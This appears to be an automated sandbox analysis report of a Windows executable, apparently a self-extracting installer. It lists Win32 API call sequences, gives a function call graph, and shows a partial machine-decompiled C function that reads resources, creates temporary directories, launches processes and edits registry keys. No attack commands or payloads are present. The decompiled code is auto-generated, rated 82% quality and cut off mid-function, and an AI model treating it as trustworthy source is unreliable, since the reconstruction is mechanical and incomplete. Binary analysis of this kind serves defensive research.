2557->2566 2559->2557 2560 239c1 MessageBeep 2559->2560 2559->2566 2561 2681f 10 API calls 2560->2561 2562 239ce 2561->2562 2563 239d8 MessageBoxA 2562->2563 2564 267c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 218d5 2567->2568 2575 219b8 2567->2575 2632 217ee LoadLibraryA 2568->2632 2570 26ce0 4 API calls 2572 219d5 2570->2572 2572->2427 2572->2435 2573 218e5 GetCurrentProcess OpenProcessToken 2574 21900 GetTokenInformation 2573->2574 2573->2575 2576 219aa CloseHandle 2574->2576 2577 21918 GetLastError 2574->2577 2575->2570 2576->2575 2577->2576 2578 21927 LocalAlloc 2577->2578 2579 21938 GetTokenInformation 2578->2579 2580 219a9 2578->2580 2581 219a2 LocalFree 2579->2581 2582 2194e AllocateAndInitializeSid 2579->2582 2580->2576 2581->2580 2582->2581 2585 2196e 2582->2585 2583 21999 FreeSid 2583->2581 2584 21975 EqualSid 2584->2585 2586 2198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 266d5 2587->2588 2589 266f3 2588->2589 2591 266e5 CharNextA 2588->2591 2599 26648 2588->2599 2589->2517 2591->2588 2593 2659b 2592->2593 2593->2593 2594 265b8 CharPrevA 2593->2594 2595 265ab 2593->2595 2594->2595 2595->2534 2602 26cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 2621d 2600 2665d IsDBCSLeadByte 2599->2600 2601 26668 2599->2601 2600->2601 2601->2588 2602->2598 2604 22a62 2603->2604 2611 2290d 2603->2611 2605 22a75 2604->2605 2606 22a6e GlobalFree 2604->2606 2605->2559 2606->2605 2608 22955 GlobalAlloc 2608->2604 2609 22968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 22a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 22a80 GlobalUnlock 2611->2612 2613 22773 2611->2613 2612->2604 2614 228b2 2613->2614 2615 227a3 CharUpperA CharNextA CharNextA 2613->2615 2616 228b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 227db 2615->2617 2620 228bf 2616->2620 2618 227e3 2617->2618 2619 228a8 GetWindowsDirectoryA 2617->2619 2625 2658a CharPrevA 2618->2625 
2619->2620 2621 228d2 2620->2621 2623 2658a CharPrevA 2620->2623 2622 26ce0 4 API calls 2621->2622 2624 228e2 2622->2624 2623->2621 2624->2611 2626 22810 RegOpenKeyExA 2625->2626 2626->2620 2627 22837 RegQueryValueExA 2626->2627 2628 2289a RegCloseKey 2627->2628 2629 2285c 2627->2629 2628->2620 2630 22867 ExpandEnvironmentStringsA 2629->2630 2631 2287a 2629->2631 2630->2631 2631->2628 2633 21890 2632->2633 2634 21826 GetProcAddress 2632->2634 2637 26ce0 4 API calls 2633->2637 2635 21889 FreeLibrary 2634->2635 2636 21839 AllocateAndInitializeSid 2634->2636 2635->2633 2636->2635 2640 2185f FreeSid 2636->2640 2638 2189f 2637->2638 2638->2573 2638->2575 2640->2635 2642 2468f 7 API calls 2641->2642 2643 251f9 LocalAlloc 2642->2643 2644 2522d 2643->2644 2645 2520d 2643->2645 2647 2468f 7 API calls 2644->2647 2646 244b9 20 API calls 2645->2646 2648 2521e 2646->2648 2649 2523a 2647->2649 2650 26285 GetLastError 2648->2650 2651 25262 lstrcmpA 2649->2651 2652 2523e 2649->2652 2659 22f4d 2650->2659 2654 25272 LocalFree 2651->2654 2655 2527e 2651->2655 2653 244b9 20 API calls 2652->2653 2656 2524f LocalFree 2653->2656 2654->2659 2657 244b9 20 API calls 2655->2657 2656->2659 2658 25290 LocalFree 2657->2658 2658->2659 2659->2438 2659->2440 2659->2472 2661 2468f 7 API calls 2660->2661 2662 25175 2661->2662 2663 2517a 2662->2663 2664 251af 2662->2664 2666 244b9 20 API calls 2663->2666 2665 2468f 7 API calls 2664->2665 2667 251c0 2665->2667 2672 2518d 2666->2672 2822 26298 2667->2822 2670 251e1 2670->2441 2671 244b9 20 API calls 2671->2672 2672->2441 2674 2468f 7 API calls 2673->2674 2675 255c7 LocalAlloc 2674->2675 2676 255db 2675->2676 2677 255fd 2675->2677 2679 244b9 20 API calls 2676->2679 2678 2468f 7 API calls 2677->2678 2681 2560a 2678->2681 2680 255ec 2679->2680 2682 26285 GetLastError 2680->2682 2683 25632 lstrcmpA 2681->2683 2684 2560e 2681->2684 2710 255f1 2682->2710 2686 25645 2683->2686 2687 2564b LocalFree 2683->2687 2685 244b9 20 API calls 2684->2685 2688 2561f 
LocalFree 2685->2688 2686->2687 2689 25696 2687->2689 2690 2565b 2687->2690 2688->2710 2691 2589f 2689->2691 2694 256ae GetTempPathA 2689->2694 2695 25467 49 API calls 2690->2695 2692 26517 24 API calls 2691->2692 2692->2710 2693 26ce0 4 API calls 2696 22f7e 2693->2696 2697 256eb 2694->2697 2698 256c3 2694->2698 2699 25678 2695->2699 2696->2449 2696->2472 2703 25717 GetDriveTypeA 2697->2703 2704 2586c GetWindowsDirectoryA 2697->2704 2697->2710 2834 25467 2698->2834 2702 244b9 20 API calls 2699->2702 2699->2710 2702->2710 2705 25730 GetFileAttributesA 2703->2705 2719 2572b 2703->2719 2868 2597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2705->2719 2709 2597d 34 API calls 2709->2719 2710->2693 2711 25467 49 API calls 2711->2697 2712 22630 21 API calls 2712->2719 2714 257c1 GetWindowsDirectoryA 2714->2719 2715 2658a CharPrevA 2716 257e8 GetFileAttributesA 2715->2716 2717 257fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 25827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2709 2719->2710 2719->2712 2719->2714 2719->2715 2719->2718 2720 25467 49 API calls 2719->2720 2864 26952 2719->2864 2720->2719 2722 26268 2721->2722 2723 26249 2721->2723 2724 2597d 34 API calls 2722->2724 2725 244b9 20 API calls 2723->2725 2730 2625f 2724->2730 2726 2625a 2725->2726 2728 26285 GetLastError 2726->2728 2727 26ce0 4 API calls 2729 23013 2727->2729 2728->2730 2729->2457 2729->2472 2730->2727 2732 23b2d 2731->2732 2732->2732 2733 23b72 2732->2733 2734 23b53 2732->2734 2934 24fe0 2733->2934 2736 26517 24 API calls 2734->2736 2737 23b70 2736->2737 2738 23b7b 2737->2738 2739 26298 10 API calls 2737->2739 2738->2471 2739->2738 2741 22622 2740->2741 2742 22583 2740->2742 2961 224e0 GetWindowsDirectoryA 2741->2961 2744 2258b 2742->2744 2745 225e8 RegOpenKeyExA 2742->2745 2747 225e3 2744->2747 2748 2259b RegOpenKeyExA 2744->2748 2746 22609 RegQueryInfoKeyA 2745->2746 2745->2747 2749 225d1 RegCloseKey 2746->2749 2747->2469 2748->2747 2750 225bc 
RegQueryValueExA 2748->2750 2749->2747 2750->2749 2752 23bdb 2751->2752 2755 23bec 2751->2755 2753 2468f 7 API calls 2752->2753 2753->2755 2754 23c03 memset 2754->2755 2755->2754 2756 23d13 2755->2756 2759 23d26 2755->2759 2760 2468f 7 API calls 2755->2760 2762 23fd7 2755->2762 2763 23d7b CompareStringA 2755->2763 2766 23fab 2755->2766 2769 23f46 LocalFree 2755->2769 2770 23f1e LocalFree 2755->2770 2774 23cc7 CompareStringA 2755->2774 2785 23e10 2755->2785 2969 21ae8 2755->2969 3010 2202a memset memset RegCreateKeyExA 2755->3010 3036 23fef 2755->3036 2757 244b9 20 API calls 2756->2757 2757->2759 2761 26ce0 4 API calls 2759->2761 2760->2755 2764 23f60 2761->2764 2762->2759 3060 22267 2762->3060 2763->2755 2763->2762 2764->2468 2768 244b9 20 API calls 2766->2768 2772 23fbe LocalFree 2768->2772 2769->2759 2770->2755 2770->2762 2772->2759 2774->2755 2775 23f92 2778 244b9 20 API calls 2775->2778 2776 23e1f GetProcAddress 2777 23f64 2776->2777 2776->2785 2779 244b9 20 API calls 2777->2779 2780 23fa9 2778->2780 2781 23f75 FreeLibrary 2779->2781 2782 23f7c LocalFree 2780->2782 2781->2782 2783 26285 GetLastError 2782->2783 2784 23f8b 2783->2784 2784->2759 2785->2775 2785->2776 2786 23f40 FreeLibrary 2785->2786 2787 23eff FreeLibrary 2785->2787 3050 26495 2785->3050 2786->2769 2787->2770 2789 2468f 7 API calls 2788->2789 2790 23a55 LocalAlloc 2789->2790 2791 23a8e 2790->2791 2792 23a6c 2790->2792 2794 2468f 7 API calls 2791->2794 2793 244b9 20 API calls 2792->2793 2795 23a7d 2793->2795 2796 23a98 2794->2796 2797 26285 GetLastError 2795->2797 2798 23ac5 lstrcmpA 2796->2798 2799 23a9c 2796->2799 2806 22f64 2797->2806 2800 23ada 2798->2800 2801 23b0d LocalFree 2798->2801 2802 244b9 20 API calls 2799->2802 2803 26517 24 API calls 2800->2803 2801->2806 2804 23aad LocalFree 2802->2804 2805 23aec LocalFree 2803->2805 2804->2806 2805->2806 2806->2438 2806->2472 2808 2628f 2807->2808 2808->2472 2810 2468f 7 API calls 2809->2810 2811 2417d LocalAlloc 2810->2811 2812 24195 2811->2812 
2813 241a8 2811->2813 2814 244b9 20 API calls 2812->2814 2815 2468f 7 API calls 2813->2815 2816 241a6 2814->2816 2817 241b5 2815->2817 2816->2472 2818 241c5 lstrcmpA 2817->2818 2819 241b9 2817->2819 2818->2819 2820 241e6 LocalFree 2818->2820 2821 244b9 20 API calls 2819->2821 2820->2816 2821->2820 2823 2171e _vsnprintf 2822->2823 2833 262c9 FindResourceA 2823->2833 2825 26353 2827 26ce0 4 API calls 2825->2827 2826 262cb LoadResource LockResource 2826->2825 2829 262e0 2826->2829 2828 251ca 2827->2828 2828->2670 2828->2671 2830 26355 FreeResource 2829->2830 2831 2631b FreeResource 2829->2831 2830->2825 2832 2171e _vsnprintf 2831->2832 2832->2833 2833->2825 2833->2826 2835 2548a 2834->2835 2853 2551a 2834->2853 2894 253a1 2835->2894 2837 25581 2841 26ce0 4 API calls 2837->2841 2840 25495 2840->2837 2844 254c2 GetSystemInfo 2840->2844 2845 2550c 2840->2845 2846 2559a 2841->2846 2842 2553b CreateDirectoryA 2847 25577 2842->2847 2848 25547 2842->2848 2843 2554d 2843->2837 2852 2597d 34 API calls 2843->2852 2851 254da 2844->2851 2849 2658a CharPrevA 2845->2849 2846->2710 2858 22630 GetWindowsDirectoryA 2846->2858 2850 26285 GetLastError 2847->2850 2848->2843 2849->2853 2854 2557c 2850->2854 2851->2845 2855 2658a CharPrevA 2851->2855 2856 2555c 2852->2856 2905 258c8 2853->2905 2854->2837 2855->2845 2856->2837 2857 25568 RemoveDirectoryA 2856->2857 2857->2837 2859 2265e 2858->2859 2860 2266f 2858->2860 2861 244b9 20 API calls 2859->2861 2862 26ce0 4 API calls 2860->2862 2861->2860 2863 22687 2862->2863 2863->2697 2863->2711 2865 269a1 2864->2865 2866 2696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 26989 MulDiv 2866->2867 2867->2865 2869 259bb 2868->2869 2870 259dd GetDiskFreeSpaceA 2868->2870 2871 244b9 20 API calls 2869->2871 2872 25ba1 memset 2870->2872 2873 25a21 MulDiv 2870->2873 2874 259cc 2871->2874 2875 26285 GetLastError 2872->2875 2873->2872 2876 25a50 GetVolumeInformationA 2873->2876 2877 26285 GetLastError 2874->2877 2878 25bbc GetLastError 
FormatMessageA 2875->2878 2879 25ab5 SetCurrentDirectoryA 2876->2879 2880 25a6e memset 2876->2880 2889 259d1 2877->2889 2881 25be3 2878->2881 2888 25acc 2879->2888 2882 26285 GetLastError 2880->2882 2883 244b9 20 API calls 2881->2883 2884 25a89 GetLastError FormatMessageA 2882->2884 2886 25bf5 SetCurrentDirectoryA 2883->2886 2884->2881 2885 26ce0 4 API calls 2887 25c11 2885->2887 2886->2889 2887->2697 2890 25b0a 2888->2890 2892 25b20 2888->2892 2889->2885 2891 244b9 20 API calls 2890->2891 2891->2889 2892->2889 2917 2268b 2892->2917 2899 253bf 2894->2899 2895 2171e _vsnprintf 2895->2899 2896 2658a CharPrevA 2897 253fa RemoveDirectoryA GetFileAttributesA 2896->2897 2898 2544f CreateDirectoryA 2897->2898 2897->2899 2900 25415 GetTempFileNameA 2898->2900 2901 2543a 2898->2901 2899->2895 2899->2896 2899->2900 2900->2901 2902 25429 DeleteFileA CreateDirectoryA 2900->2902 2903 26ce0 4 API calls 2901->2903 2902->2901 2904 25449 2903->2904 2904->2840 2906 258d8 2905->2906 2906->2906 2907 258df LocalAlloc 2906->2907 2908 258f3 2907->2908 2909 25919 2907->2909 2910 244b9 20 API calls 2908->2910 2912 2658a CharPrevA 2909->2912 2916 25906 2910->2916 2911 26285 GetLastError 2913 25534 2911->2913 2914 25931 CreateFileA LocalFree 2912->2914 2913->2842 2913->2843 2915 2595b CloseHandle GetFileAttributesA 2914->2915 2914->2916 2915->2916 2916->2911 2916->2913 2918 226e5 2917->2918 2919 226b9 2917->2919 2921 226ea 2918->2921 2922 2271f 2918->2922 2920 2171e _vsnprintf 2919->2920 2923 226cc 2920->2923 2924 2171e _vsnprintf 2921->2924 2925 2171e _vsnprintf 2922->2925 2932 226e3 2922->2932 2927 244b9 20 API calls 2923->2927 2928 226fd 2924->2928 2930 22735 2925->2930 2926 26ce0 4 API calls 2931 2276d 2926->2931 2927->2932 2929 244b9 20 API calls 2928->2929 2929->2932 2933 244b9 20 API calls 2930->2933 2931->2889 2932->2926 2933->2932 2935 2468f 7 API calls 2934->2935 2936 24ff5 FindResourceA LoadResource LockResource 2935->2936 2937 25020 2936->2937 2950 2515f 2936->2950 2938 25057 
2937->2938 2939 25029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 24efd 2938->2953 2939->2938 2942 25060 2944 244b9 20 API calls 2942->2944 2943 2507c 2945 25075 2943->2945 2946 244b9 20 API calls 2943->2946 2944->2945 2947 25110 FreeResource 2945->2947 2948 2511d 2945->2948 2946->2945 2947->2948 2949 2513a 2948->2949 2951 244b9 20 API calls 2948->2951 2949->2950 2952 2514c SendMessageA 2949->2952 2950->2737 2951->2949 2952->2950 2954 24f4a 2953->2954 2955 24fa1 2954->2955 2956 24980 25 API calls 2954->2956 2957 26ce0 4 API calls 2955->2957 2959 24f67 2956->2959 2958 24fc6 2957->2958 2958->2942 2958->2943 2959->2955 2960 24b60 FindCloseChangeNotification 2959->2960 2960->2955 2962 22510 2961->2962 2963 2255b 2961->2963 2964 2658a CharPrevA 2962->2964 2965 26ce0 4 API calls 2963->2965 2966 22522 WritePrivateProfileStringA _lopen 2964->2966 2967 22569 2965->2967 2966->2963 2968 22548 _llseek _lclose 2966->2968 2967->2747 2968->2963 2970 21b25 2969->2970 3074 21a84 2970->3074 2972 21b57 2973 2658a CharPrevA 2972->2973 2974 21b8c 2972->2974 2973->2974 2975 266c8 2 API calls 2974->2975 2976 21bd1 2975->2976 2977 21d73 2976->2977 2978 21bd9 CompareStringA 2976->2978 2980 266c8 2 API calls 2977->2980 2978->2977 2979 21bf7 GetFileAttributesA 2978->2979 2981 21d53 2979->2981 2982 21c0d 2979->2982 2983 21d7d 2980->2983 2986 21d64 2981->2986 2982->2981 2987 21a84 2 API calls 2982->2987 2984 21d81 CompareStringA 2983->2984 2985 21df8 LocalAlloc 2983->2985 2984->2985 2994 21d9b 2984->2994 2985->2986 2988 21e0b GetFileAttributesA 2985->2988 2989 244b9 20 API calls 2986->2989 2990 21c31 2987->2990 2991 21e45 2988->2991 2992 21e1d 2988->2992 3004 21d6c 2989->3004 2993 21c50 LocalAlloc 2990->2993 2998 21a84 2 API calls 2990->2998 3080 22aac 2991->3080 2992->2991 2993->2986 2995 21c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2995 2994->2994 2999 21dbe LocalAlloc 2994->2999 3003 21cf8 2995->3003 3008 21cc2 2995->3008 2996 26ce0 4 API calls 2997 21ea1 
2996->2997 2997->2755 2998->2993 2999->2986 3002 21de1 2999->3002 3007 2171e _vsnprintf 3002->3007 3005 21d23 3003->3005 3006 21d09 GetShortPathNameA 3003->3006 3004->2996 3009 2171e _vsnprintf 3005->3009 3006->3005 3007->3008 3008->3004 3009->3008 3011 22256 3010->3011 3012 2209a 3010->3012 3013 26ce0 4 API calls 3011->3013 3015 2171e _vsnprintf 3012->3015 3017 220dc 3012->3017 3014 22263 3013->3014 3014->2755 3016 220af RegQueryValueExA 3015->3016 3016->3012 3016->3017 3018 220e4 RegCloseKey 3017->3018 3019 220fb GetSystemDirectoryA 3017->3019 3018->3011 3020 2658a CharPrevA 3019->3020 3021 2211b LoadLibraryA 3020->3021 3022 22179 GetModuleFileNameA 3021->3022 3023 2212e GetProcAddress FreeLibrary 3021->3023 3024 221de RegCloseKey 3022->3024 3028 22177 LocalAlloc 3022->3028 3023->3022 3025 2214e GetSystemDirectoryA 3023->3025 3024->3011 3026 22165 3025->3026 3025->3028 3027 2658a CharPrevA 3026->3027 3027->3028 3030 221ec 3028->3030 3031 221cd 3028->3031 3033 2171e _vsnprintf 3030->3033 3032 244b9 20 API calls 3031->3032 3032->3024 3034 22218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3011 3037 24016 CreateProcessA 3036->3037 3038 24106 3036->3038 3039 24041 WaitForSingleObject GetExitCodeProcess 3037->3039 3040 240c4 3037->3040 3041 26ce0 4 API calls 3038->3041 3042 24070 3039->3042 3044 26285 GetLastError 3040->3044 3043 24117 3041->3043 3107 2411b 3042->3107 3043->2755 3046 240c9 GetLastError FormatMessageA 3044->3046 3048 244b9 20 API calls 3046->3048 3047 24096 CloseHandle CloseHandle 3047->3038 3049 240ba 3047->3049 3048->3038 3049->3038 3051 264c2 3050->3051 3052 2658a CharPrevA 3051->3052 3053 264d8 GetFileAttributesA 3052->3053 3054 26501 LoadLibraryA 3053->3054 3055 264ea 3053->3055 3057 26508 3054->3057 3055->3054 3056 264ee LoadLibraryExA 3055->3056 3056->3057 3058 26ce0 4 API calls 3057->3058 3059 26513 3058->3059 3059->2785 3061 22381 3060->3061 3062 22289 RegOpenKeyExA 3060->3062 3063 26ce0 4 API calls 3061->3063 3062->3061 3064 222b1 
RegQueryValueExA 3062->3064 3065 2238c 3063->3065 3066 222e6 memset GetSystemDirectoryA 3064->3066 3067 22374 RegCloseKey 3064->3067 3065->2759 3068 22321 3066->3068 3069 2230f 3066->3069 3067->3061 3070 2171e _vsnprintf 3068->3070 3071 2658a CharPrevA 3069->3071 3072 2233f RegSetValueExA 3070->3072 3071->3068 3072->3067 3075 21a9a 3074->3075 3077 21aba 3075->3077 3079 21aaf 3075->3079 3093 2667f 3075->3093 3077->2972 3078 2667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 22ad4 GetModuleFileNameA 3080->3081 3082 22be6 3080->3082 3090 22b02 3081->3090 3083 26ce0 4 API calls 3082->3083 3085 22bf5 3083->3085 3084 22af1 IsDBCSLeadByte 3084->3090 3085->3004 3086 22b11 CharNextA CharUpperA 3089 22b8d CharUpperA 3086->3089 3086->3090 3087 22bca CharNextA 3088 22bd3 CharNextA 3087->3088 3088->3090 3089->3090 3090->3082 3090->3084 3090->3086 3090->3087 3090->3088 3092 22b43 CharPrevA 3090->3092 3098 265e8 3090->3098 3092->3090 3094 26689 3093->3094 3095 266a5 3094->3095 3096 26648 IsDBCSLeadByte 3094->3096 3097 26697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 265f4 3098->3099 3099->3099 3100 265fb CharPrevA 3099->3100 3101 26611 CharPrevA 3100->3101 3102 2660b 3101->3102 3103 2661e 3101->3103 3102->3101 3102->3103 3104 26627 CharPrevA 3103->3104 3105 26634 CharNextA 3103->3105 3106 2663d 3103->3106 3104->3105 3104->3106 3105->3106 3106->3090 3108 24132 3107->3108 3110 2412a 3107->3110 3111 21ea7 3108->3111 3110->3047 3112 21eba 3111->3112 3113 21ed3 3111->3113 3114 2256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 21ff0 RegOpenKeyExA 3115->3116 3117 22026 3115->3117 3116->3117 3118 2200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3227 26a20 __getmainargs 3228 219e0 3229 21a03 3228->3229 3230 21a24 GetDesktopWindow 3228->3230 3232 21a20 3229->3232 3233 21a16 EndDialog 3229->3233 3231 243d0 11 API calls 3230->3231 3234 21a33 LoadStringA SetDlgItemTextA MessageBeep 3231->3234 3235 26ce0 4 API calls 3232->3235 3233->3232 3234->3232 
3236 21a7e 3235->3236 3237 26bef _XcptFilter 3238 27270 _except_handler4_common 3239 269b0 3240 269b5 3239->3240 3248 26fbe GetModuleHandleW 3240->3248 3242 269c1 __set_app_type __p__fmode __p__commode 3243 269f9 3242->3243 3244 26a02 __setusermatherr 3243->3244 3245 26a0e 3243->3245 3244->3245 3250 271ef _controlfp 3245->3250 3247 26a13 3249 26fcf 3248->3249 3249->3242 3250->3247 3251 234f0 3252 23504 3251->3252 3253 235b8 3251->3253 3252->3253 3254 2351b 3252->3254 3255 235be GetDesktopWindow 3252->3255 3256 23671 EndDialog 3253->3256 3257 23526 3253->3257 3259 2354f 3254->3259 3260 2351f 3254->3260 3258 243d0 11 API calls 3255->3258 3256->3257 3261 235d6 3258->3261 3259->3257 3263 23559 ResetEvent 3259->3263 3260->3257 3262 2352d TerminateThread EndDialog 3260->3262 3265 235e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3266 2361d SetWindowTextA CreateThread 3261->3266 3262->3257 3264 244b9 20 API calls 3263->3264 3267 23581 3264->3267 3265->3266 3266->3257 3268 23646 3266->3268 3269 2359b SetEvent 3267->3269 3271 2358a SetEvent 3267->3271 3270 244b9 20 API calls 3268->3270 3272 23680 4 API calls 3269->3272 3270->3253 3271->3257 3272->3253 3273 26ef0 3274 26f2d 3273->3274 3276 26f02 3273->3276 3275 26f27 ?terminate@ 3275->3274 3276->3274 3276->3275

Callgraph

[Figure: function call graph. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available]
                                                                                                                                                                                                                                                callgraph 0 Function_00024702 51 Function_00021680 0->51 80 Function_000216B3 0->80 1 Function_00026C03 28 Function_0002724D 1->28 2 Function_00027000 3 Function_00024200 4 Function_00023100 95 Function_000243D0 4->95 5 Function_00027208 6 Function_0002490C 7 Function_00023210 19 Function_00024224 7->19 49 Function_0002597D 7->49 57 Function_0002658A 7->57 83 Function_000244B9 7->83 89 Function_000258C8 7->89 7->95 8 Function_00027010 9 Function_00025C17 10 Function_00026517 10->83 11 Function_0002411B 75 Function_00021EA7 11->75 12 Function_0002171E 13 Function_0002621E 13->49 56 Function_00026285 13->56 13->83 98 Function_00026CE0 13->98 14 Function_0002681F 14->98 117 Function_000266F9 14->117 15 Function_00022F1D 15->13 18 Function_00023B26 15->18 24 Function_00023A3F 15->24 40 Function_00025164 15->40 41 Function_00024169 15->41 42 Function_0002256D 15->42 15->56 15->57 68 Function_00023BA2 15->68 72 Function_000255A0 15->72 15->83 15->98 103 Function_000251E5 15->103 16 Function_00027120 17 Function_00026A20 18->10 65 Function_00026298 18->65 96 Function_00024FE0 18->96 19->51 19->83 20 Function_00026E2A 113 Function_00026CF0 20->113 21 Function_0002202A 21->12 21->57 21->83 21->98 22 Function_00022630 22->83 22->98 23 Function_00024C37 24->10 24->56 60 Function_0002468F 24->60 24->83 25 Function_00026C3F 26 Function_00026F40 27 Function_00026648 29 Function_00026952 30 Function_00024A50 31 Function_00023450 31->95 32 Function_00026F54 32->5 32->28 33 Function_00027155 34 Function_00024B60 35 Function_00026A60 35->5 35->25 35->28 35->33 36 Function_00027060 35->36 116 Function_00022BFB 35->116 36->8 36->16 37 Function_00026760 38 Function_00025467 38->49 38->51 54 Function_00021781 38->54 38->56 38->57 73 Function_000253A1 
38->73 38->89 38->98 39 Function_00022267 39->12 39->57 39->98 40->60 40->65 40->83 41->60 41->83 97 Function_000224E0 42->97 43 Function_0002476D 43->10 78 Function_000266AE 43->78 44 Function_00022773 44->51 44->54 44->57 44->98 45 Function_00027270 46 Function_00026C70 47 Function_0002487A 47->6 48 Function_0002667F 48->27 49->56 58 Function_0002268B 49->58 49->83 49->98 50 Function_00024980 50->47 50->83 51->54 52 Function_00023680 53 Function_00026380 55 Function_00021A84 55->48 57->80 58->12 58->83 58->98 59 Function_00022A89 61 Function_00026793 62 Function_00022390 62->51 62->57 62->62 62->80 62->98 63 Function_00021F90 63->75 63->83 63->98 64 Function_00026495 64->54 64->57 64->98 65->12 65->98 66 Function_00024E99 66->51 67 Function_00025C9E 67->9 67->20 67->48 67->51 67->57 67->83 90 Function_000266C8 67->90 67->98 99 Function_000231E0 67->99 68->21 68->39 68->54 68->56 68->60 68->64 68->83 68->98 105 Function_00021AE8 68->105 110 Function_00023FEF 68->110 69 Function_000272A2 70 Function_000218A3 70->98 109 Function_000217EE 70->109 71 Function_00024CA0 72->10 72->22 72->29 72->38 72->49 72->54 72->56 72->57 72->60 72->83 72->98 73->12 73->51 73->57 73->98 74 Function_00026FA1 75->42 76 Function_00026FA5 76->28 77 Function_00022CAA 77->10 77->60 77->62 77->67 77->70 77->83 77->98 108 Function_000236EE 77->108 79 Function_00022AAC 79->51 91 Function_000217C8 79->91 79->98 107 Function_000265E8 79->107 80->54 81 Function_000269B0 81->2 81->46 84 Function_00026FBE 81->84 111 Function_000271EF 81->111 82 Function_000252B6 82->54 82->62 82->98 102 Function_00021FE1 82->102 82->107 83->12 83->14 83->51 92 Function_000267C9 83->92 83->98 84->32 85 Function_00024CC0 86 Function_00024BC0 87 Function_000230C0 88 Function_000263C0 88->54 88->57 88->98 89->51 89->56 89->57 89->83 90->27 92->61 93 Function_00024AD0 93->52 94 Function_00024CD0 94->0 94->23 94->34 94->43 94->50 94->66 94->98 100 Function_000247E0 94->100 95->98 96->60 96->83 119 Function_00024EFD 
96->119 97->57 97->98 98->113 100->51 100->83 101 Function_000219E0 101->95 101->98 103->56 103->60 103->83 104 Function_000270EB 105->12 105->51 105->54 105->55 105->57 105->79 105->80 105->83 105->90 105->98 106 Function_000228E8 106->44 106->59 108->14 108->59 108->83 108->92 108->98 108->106 109->98 110->11 110->56 110->83 110->98 112 Function_00026BEF 114 Function_000234F0 114->52 114->83 114->95 115 Function_00026EF0 116->15 116->63 116->77 116->82 118 Function_000270FE 119->34 119->50 119->98

Control-flow Graph
C-Code - Quality: 82%
E00023BA2() {
    signed int _v8;
    signed int _v12;
    char _v276;
    char _v280;
    short _v300;
    intOrPtr _v304;
    void _v348;
    char _v352;
    intOrPtr _v356;
    signed int _v360;
    short _v364;
    char* _v368;
    intOrPtr _v372;
    void* _v376;
    intOrPtr _v380;
    char _v384;
    signed int _v388;
    intOrPtr _v392;
    signed int _v396;
    signed int _v400;
    signed int _v404;
    void* _v408;
    void* _v424;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t69;
    signed int _t76;
    void* _t77;
    signed int _t79;
    short _t96;
    signed int _t97;
    intOrPtr _t98;
    signed int _t101;
    signed int _t104;
    signed int _t108;
    int _t112;
    void* _t115;
    signed char _t118;
    void* _t125;
    signed int _t127;
    void* _t128;
    struct HINSTANCE__* _t129;
    void* _t130;
    short _t137;
    char* _t140;
    signed char _t144;
    signed char _t145;
    signed int _t149;
    void* _t150;
    void* _t151;
    signed int _t153;
    void* _t155;
    void* _t156;
    signed int _t157;
    signed int _t162;
    signed int _t164;
    void* _t165;

    _t164 = (_t162 & 0xfffffff8) - 0x194;
    _t69 =  *0x28004; // 0xf4950d3e
    _v8 = _t69 ^ _t164;
    _t153 = 0;
     *0x29124 =  *0x29124 & 0;
    _t149 = 0;
    _v388 = 0;
    _v384 = 0;
    _t165 =  *0x28a28 - _t153; // 0x0
    if(_t165 != 0) {
        L3:
        _t127 = 0;
        _v392 = 0;
        while(1) {
            _v400 = _v400 & 0x00000000;
            memset( &_v348, 0, 0x44);
            _t164 = _t164 + 0xc;
            _v348 = 0x44;
            if( *0x28c42 != 0) {
                goto L26;
            }
            _t146 =  &_v396;
            _t115 = E0002468F("SHOWWINDOW",  &_v396, 4);
            if(_t115 == 0 || _t115 > 4) {
                L25:
                _t146 = 0x4b1;
                E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
                 *0x29124 = 0x80070714;
                goto L62;
            } else {
                if(_v396 != 1) {
                    __eflags = _v396 - 2;
                    if(_v396 != 2) {
                        _t137 = 3;
                        __eflags = _v396 - _t137;
                        if(_v396 == _t137) {
                            _v304 = 1;
                            _v300 = _t137;
                        }
                                                                                                                                                                                                                                                									goto L14;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_push(6);
                                                                                                                                                                                                                                                								_v304 = 1;
                                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                                								goto L11;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_v304 = 1;
                                                                                                                                                                                                                                                								L11:
                                                                                                                                                                                                                                                								_v300 = 0;
                                                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                                                								if(_t127 != 0) {
                                                                                                                                                                                                                                                									L27:
                                                                                                                                                                                                                                                									_t155 = 1;
                                                                                                                                                                                                                                                									__eflags = _t127 - 1;
                                                                                                                                                                                                                                                									if(_t127 != 1) {
                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                										_t132 =  &_v280;
                                                                                                                                                                                                                                                										_t76 = E00021AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                                										if(_t76 == 0) {
                                                                                                                                                                                                                                                											L62:
                                                                                                                                                                                                                                                											_t77 = 0;
                                                                                                                                                                                                                                                											L63:
                                                                                                                                                                                                                                                											_pop(_t150);
                                                                                                                                                                                                                                                											_pop(_t156);
                                                                                                                                                                                                                                                											_pop(_t128);
